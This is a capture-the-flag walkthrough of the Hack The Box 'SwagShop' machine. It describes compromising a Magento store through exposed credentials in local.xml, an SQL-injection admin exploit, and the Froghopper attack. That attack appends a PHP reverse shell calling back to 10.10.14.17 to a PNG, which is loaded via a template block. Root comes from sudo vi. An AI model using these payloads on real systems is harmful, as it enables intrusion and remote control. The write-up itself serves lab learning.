Walkthru for SwagShop

This is a detailed walk-thru for SwapShop written by dR1PPy

Challenges like the one posed by SwagShop are some of my favorite.
The ones that require a good combination of skills with toolsets along with skills with chaining exploits.

Overall a fun box to beat up on much thanks to ch4p for the challenge!

___ ___
/| |/|\| |\
/_| ´ |.` |_\ We are open! (Almost)
| |. |
| |. | Join the beta HTB Swag Store!
|___|.__| https://hackthebox.store/password

PS: Use root flag as password!

Enumeration

Port Scan All The Things!

Services
========

host port proto name state info
---- ---- ----- ---- ----- ----
10.10.10.140 22 tcp ssh open OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 Ubuntu Linux; protocol 2.0
10.10.10.140 80 tcp http open Apache httpd 2.4.18 (Ubuntu)

We quickly verify the OpenSSH & Apache versions are not a known exploitable version and move on.
During our HTTP enumeration we find this XML file

http://10.10.10.140/app/etc/local.xml

Which seems to contain some credentials (Possibly for the Beta SwagShop)

localhostrootfMVWh7bDHpgZkyfqQXreTjU9swagshop

We are also able to enumerate the framework as Magento.

Gaining User Access

After some Google searching we find an exploit which gives us access to the Admin panel of the Framework via an SQLi

https://github.com/joren485/Magento-Shoplift-SQLI/

Once inside we can use the Magento frog hopper attack to get shell
https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper

First step is to enable symlinks in the settings of Magento.

System > Configuration > Advanced > Developer > Template Settings > Allow Symlinks "Yes" (Then save config)

Now we prep our shell by creating a file with the content below

<!--?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.17/8888 0>&1'"); ?-->

Now we get some random PNG file

And place our shellcode inside.

cat /tmp/shell.code >> random.png ### If the shell doesnt work try a better reverse shell example cat php-reverse-shell-1.0/php-reverse-shell.php >> random.png

Now back to Magento where we create a catalog item with our new png as the image logo.
Then we create a newsletter to load our code by adding the following to it's body.

{{block type='core/template' template='../../../../../../media/catalog/category/dR1PPy.png'}}

Now we start our listener then preview the template

nc -lvp 8888 # on my local machine

Using FrogHopper Attack with PNG file worked!

(NOTE: for some reason this attack kept failing with JPG files)

Once we have a shell we upgrade it to be fully TTY. We see /usr/bin/python3 is available so we can get TTY like so

python3 -c 'import pty; pty.spawn("/bin/sh")'

We grab the user flag found in /home/haris/user.txt and proceed to escalation.

Privilege Escalation

Again we start our enumeration cycle using the standard Enum tools.

Quickly we find LinEnum has shown us the path to root

[+] We can sudo without supplying a password!
Matching Defaults entries for www-data on swagshop:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
(root) NOPASSWD: /usr/bin/vi /var/www/html/*

[+] Possible sudo pwnage!
/usr/bin/vi

We can execute vi as root as long as we edit something in the /var/www/html/ directory.
So we exploit this like so

/usr/bin/vi /var/www/html/test.sh

Once in VI editor we break out to our root shell like the Kool-Aid man

:!/bin/sh

# whoami
root
# cd /root/
# ls
root.txt

OH Yeah!

Resources:

Magento SQLi POC
https://github.com/joren485/Magento-Shoplift-SQLI/

Magento Froghopper Attack
https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper

GTFOBins for the PrivEsc syntax
https://gtfobins.github.io/